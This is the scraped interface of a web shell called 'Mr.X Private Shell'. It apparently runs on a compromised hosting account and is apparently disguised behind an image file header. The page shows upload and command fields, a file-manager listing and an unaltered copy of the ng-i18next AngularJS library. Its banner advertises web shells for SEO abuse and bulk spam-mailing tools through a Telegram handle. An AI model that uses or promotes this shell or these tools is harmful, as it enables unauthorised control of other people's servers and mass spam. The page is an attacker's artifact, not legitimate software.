����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
/*!
 * ng-i18next - Version 1.0.4 - 2017-05-26
 * Copyright (c) 2017 Andre Meyering
 *
 * AngularJS provider, filter and directive for i18next (i18next by Jan Mühlemann)
 *
 * - Source: https://github.com/i18next/ng-i18next/
 * - Issues: https://github.com/i18next/ng-i18next/issues
 *
 * License: MIT - https://github.com/i18next/ng-i18next/blob/master/LICENSE
 *
*/
(function (global, factory) {
	typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory(require('angular')) :
	typeof define === 'function' && define.amd ? define(['angular'], factory) :
	(global.ngI18next = factory(global.angular));
}(this, (function (angular) { 'use strict';

var I18nDirective = (function () {
    function I18nDirective($interpolate) {
        var _this = this;
        this.$interpolate = $interpolate;
        this.restrict = 'A';
        this.scope = false;
        this.controller = 'NgI18nextController';
        this.link = function ($scope, $element, $attrs, ctrl) {
            var self = _this;
            var translationValue = '';
            var isTransformed = false;
            translationValue = $attrs.ngI18next.replace(/^\s+|\s+$/g, '');
            if (translationValue.indexOf('__once__') < 0) {
                $attrs.$observe('ngI18next', observe);
            }
            else {
                // Remove '__once__'
                translationValue = translationValue.split('__once__').join('');
                ctrl.localize(translationValue, true);
            }
            $scope.$on('i18nextLanguageChange', function () {
                ctrl.localize(translationValue);
            });
            function observe(value) {
                if (angular.isDefined(value)) {
                    translationValue = value.replace(/^\s+|\s+$/g, ''); // RegEx removes whitespace
                    if (translationValue === '') {
                        return setupWatcher();
                    }
                    ctrl.localize(translationValue);
                }
            }
            function setupWatcher() {
                // Prevent from executing this method twice
                if (isTransformed) {
                    return;
                }
                // interpolate is allowing to transform {{expr}} into text
                var interpolation = self.$interpolate($element.html());
                $scope.$watch(interpolation, observe);
                isTransformed = true;
            }
        };
    }
    I18nDirective.factory = function () {
        var directive = function ($interpolate) { return new I18nDirective($interpolate); };
        directive.$inject = ['$interpolate'];
        return directive;
    };
    return I18nDirective;
}());

var I18nBindOnceDirective = (function () {
    function I18nBindOnceDirective($compile) {
        var _this = this;
        this.$compile = $compile;
        this.restrict = 'A';
        this.scope = false;
        this.link = function (scope, element, attrs) {
            var newElement = element.clone();
            newElement.attr('ng-i18next', '__once__' + attrs.boI18next);
            newElement.removeAttr('bo-i18next');
            element.replaceWith(_this.$compile(newElement)(scope));
        };
    }
    I18nBindOnceDirective.factory = function () {
        var directive = function ($compile) { return new I18nBindOnceDirective($compile); };
        directive.$inject = ['$compile'];
        return directive;
    };
    return I18nBindOnceDirective;
}());

var I18nDirectiveController = (function () {
    function I18nDirectiveController($scope, $element, $compile, $parse, $interpolate, $sanitize, $i18next) {
        this.$scope = $scope;
        this.$element = $element;
        this.$compile = $compile;
        this.$parse = $parse;
        this.$interpolate = $interpolate;
        this.$sanitize = $sanitize;
        this.$i18next = $i18next;
    }
    I18nDirectiveController.prototype.localize = function (key, noWatch) {
        var keys = key.split(';');
        for (var i = 0; i < keys.length; ++i) {
            key = keys[i].trim();
            if (key === '') {
                continue;
            }
            this.parse(key, noWatch);
        }
    };
    
    I18nDirectiveController.prototype.parse = function (key, noWatch) {
        var _this = this;
        var parsedKey = this.parseKey(key);
        // If there are watched values, unregister them
        if (this.argsUnregister) {
            this.argsUnregister();
        }
        if (this.stringUnregister) {
            this.stringUnregister();
        }
        if (!noWatch) {
            this.argsUnregister = this.$scope.$watch(function () {
                return parsedKey.i18nOptions(_this.$scope);
            }, function () { return _this.render(parsedKey, noWatch); }, true);
        }
        this.render(parsedKey, noWatch);
    };
    I18nDirectiveController.prototype.parseKey = function (key) {
        var options = {
            attr: 'text',
        };
        var i18nOptions = '{}';
        var tmp;
        key = key.trim();
        if (key.indexOf('[') === 0) {
            tmp = key.split(']');
            options = this.parseOptions(tmp.shift().substr(1).trim());
            key = tmp.join(']');
        }
        if (key.indexOf('(') === 0 && key.indexOf(')') >= 0) {
            tmp = key.split(')');
            key = tmp.pop().trim();
            i18nOptions = tmp.join(')').substr(1).trim();
        }
        var parsedKey = {
            i18nOptions: this.$parse(i18nOptions),
            key: key,
            options: options,
        };
        return parsedKey;
    };
    I18nDirectiveController.prototype.parseOptions = function (options) {
        var res = {
            attr: 'text',
        };
        var optionsSplit = options.split(':');
        for (var i = 0; i < optionsSplit.length; ++i) {
            if (optionsSplit[i] === 'i18next') {
                res[optionsSplit[i]] = true;
            }
            else {
                res.attr = optionsSplit[i];
            }
        }
        return res;
    };
    I18nDirectiveController.prototype.render = function (parsedKey, noWatch) {
        if (angular.isDefined(this) && angular.isDefined(this.$scope)) {
            var i18nOptions_1 = parsedKey.i18nOptions(this.$scope);
            if (i18nOptions_1.sprintf) {
                i18nOptions_1.postProcess = 'sprintf';
            }
            if (parsedKey.options.attr === 'html') {
                angular.forEach(i18nOptions_1, function (value, key) {
                    var newValue = undefined;
                    var sanitized = this.$sanitize(value);
                    var numeric = Number(value);
                    if (typeof numeric === 'number' && !isNaN(numeric)) {
                        newValue = numeric;
                    }
                    else {
                        newValue = sanitized;
                    }
                    i18nOptions_1[key] = newValue; // jshint ignore:line
                }, this);
            }
            var localizedString = this.$i18next.t(parsedKey.key, i18nOptions_1);
            if (angular.isDefined(localizedString)) {
                if (parsedKey.options.attr === 'html') {
                    this.$element.empty().append(localizedString);
                    /*
                     * Now compile the content of the element and bind the variables to
                     * the scope
                     */
                    this.$compile(this.$element.contents())(this.$scope);
                    return;
                }
                if (this.stringUnregister) {
                    this.stringUnregister();
                }
                var insertText = this.$element.text.bind(this.$element);
                if (parsedKey.options.attr !== 'text') {
                    insertText = this.$element.attr.bind(this.$element, parsedKey.options.attr);
                }
                var localizedStringInterpolation = this.$interpolate(localizedString);
                if (!noWatch) {
                    this.stringUnregister = this.$scope.$watch(localizedStringInterpolation, insertText);
                }
                insertText(localizedStringInterpolation(this.$scope));
            }
        }
    };
    I18nDirectiveController.$inject = ['$scope', '$element', '$compile', '$parse', '$interpolate', '$sanitize', '$i18next'];
    return I18nDirectiveController;
}());

var I18nFilter = (function () {
    function I18nFilter() {
    }
    I18nFilter.factory = function () {
        var filter = function ($i18next) {
            function i18nextFilter(key, options) {
                var localOptions = angular.isDefined(options) ? options : {};
                return $i18next.t(key, localOptions);
            }
            i18nextFilter.$stateful = true;
            return i18nextFilter;
        };
        filter.$inject = ['$i18next'];
        return filter;
    };
    return I18nFilter;
}());

var I18nTranslateService = (function () {
    function I18nTranslateService($rootScope, translationOptions) {
        this.$rootScope = $rootScope;
        this.options = {};
        this.tOptions = {};
        this.modules = [];
        this.translations = {};
        this.i18n = i18next;
        this.tOptions = translationOptions;
        this.initializeI18next();
    }
    I18nTranslateService.prototype.t = function (key, ownOptions) {
        var hasOwnOptions = angular.isDefined(ownOptions);
        var hasOwnNsOption = hasOwnOptions && angular.isDefined(ownOptions.ns);
        var hasInitNsObj = angular.isDefined(this.options) && angular.isDefined(this.options.ns);
        var defaultOptions = this.options;
        var mergedOptions;
        var lng;
        // https://github.com/i18next/i18next/blob/e47bdb4d5528c752499b0209d829fde4e1cc96e7/src/i18next.translate.js#L232
        // Because of i18next read namespace from `options.ns`
        if (angular.isUndefined(hasOwnNsOption) && hasInitNsObj) {
            defaultOptions = angular.extend({}, this.options);
            defaultOptions.ns = defaultOptions.defaultNS;
        }
        mergedOptions = hasOwnOptions ? ownOptions : this.tOptions;
        // https://github.com/i18next/i18next/blob/7af53d5a01cc9942c0edae361bd2f65361e340c9/src/i18next.translate.js#L289
        // lng will be deleted in some case
        lng = mergedOptions.lng;
        this.translate(key, mergedOptions, hasOwnOptions);
        return angular.isDefined(lng) ? this.translations[lng][key] : this.translations['auto'][key];
    };
    //JetApps
	I18nTranslateService.prototype.setDefaultNamespace = function (ns) {
		var _this = this;
		this.translations = {};
		if (this.options.defaultNS !== ns) {
			this.options.defaultNS = ns;
			this.i18n.setDefaultNamespace(ns, function (err, t) {
				_this.$rootScope.$broadcast('i18nextDefaultNSChange', _this.i18n.defaultNS);
			});
		}
	};
	//JetApps
	I18nTranslateService.prototype.loadNamespaces = function (ns) {
		var _this = this;
        this.translations = {};
		this.i18n.loadNamespaces(ns, function (err, t) {
            _this.$rootScope.$broadcast('i18nextNSLoad', _this.i18n.ns);
        });
		
	};
    I18nTranslateService.prototype.changeLanguage = function (lng) {
        var _this = this;
		this.translations = {};
        if (this.options.lng !== lng && this.i18n.language !== lng) {
            this.options.lng = lng;
            this.i18n.changeLanguage(lng, function (err, t) {
                _this.$rootScope.$broadcast('i18nextLanguageChange', _this.i18n.language);
            });
        }
    };
    I18nTranslateService.prototype.changeOptions = function (options) {
        if (angular.isDefined(options)) {
            this.options = options;
        }
    };
    I18nTranslateService.prototype.initializeI18next = function () {
        var self = this;
        if (i18next) {
            // assign instance of i18next
            this.i18n = i18next;
            this.options = i18next.options;
        }
        else {
            var error = new Error('[ng-i18next] Can\'t find i18next and/or i18next options! Please refer to i18next.');
            this.handleError(error);
        }
        i18next.on('initialized', function (options) {
            self.options = options;
            self.$rootScope.$broadcast('i18nextLanguageChange', self.options.lng);
        });
    };
    I18nTranslateService.prototype.translate = function (key, tOptions, hasOwnOptions) {
        var localOptions = angular.isDefined(tOptions) && hasOwnOptions ? tOptions : this.tOptions;
        var lng = localOptions.lng || 'auto';
        if (angular.isUndefined(this.translations[lng])) {
            this.translations[lng] = {};
        }
        if (angular.isUndefined(this.i18n)) {
            this.translations[lng][key] = angular.isDefined(localOptions.defaultValue) ? localOptions.defaultValue : key;
        }
        else if (angular.isUndefined(this.translations[lng][key]) || hasOwnOptions) {
            this.translations[lng][key] = this.i18n.t(key, localOptions);
        }
    };
    I18nTranslateService.prototype.handleError = function (error) {
        var message = angular.isDefined(error.message) ? error.message : error[0];
        // tslint:disable-next-line:no-console
        console.log(message);
    };
    return I18nTranslateService;
}());

var I18nProvider = (function () {
    function I18nProvider() {
        var _this = this;
        this.translationOptions = {};
        this.$get = function ($rootScope) {
            if (i18next) {
                return new I18nTranslateService($rootScope, _this.translationOptions);
            }
            else {
                throw 'i18next is not loaded';
            }
        };
        this.$get.$inject = ['$rootScope'];
    }
    return I18nProvider;
}());
angular.module('jm.i18next', ['ng', 'ngSanitize'])
    .provider('$i18next', I18nProvider)
    .directive('ngI18next', I18nDirective.factory())
    .directive('boI18next', I18nBindOnceDirective.factory())
    .controller('NgI18nextController', I18nDirectiveController)
    .filter('i18next', I18nFilter.factory());
var provider = 'jm.i18next';

return provider;

})));

Filemanager

Name Type Size Permission Actions
i18next.js File 76.94 KB 0644
i18next.min.js File 35.29 KB 0644
i18nextHttpBackend.js File 16.52 KB 0644
i18nextHttpBackend.min.js File 8.76 KB 0644
i18nextSprintfPostProcessor.js File 8.97 KB 0644
i18nextSprintfPostProcessor.min.js File 3.5 KB 0644
ng-i18next.js File 13.89 KB 0644
ng-i18next.min.js File 5.62 KB 0644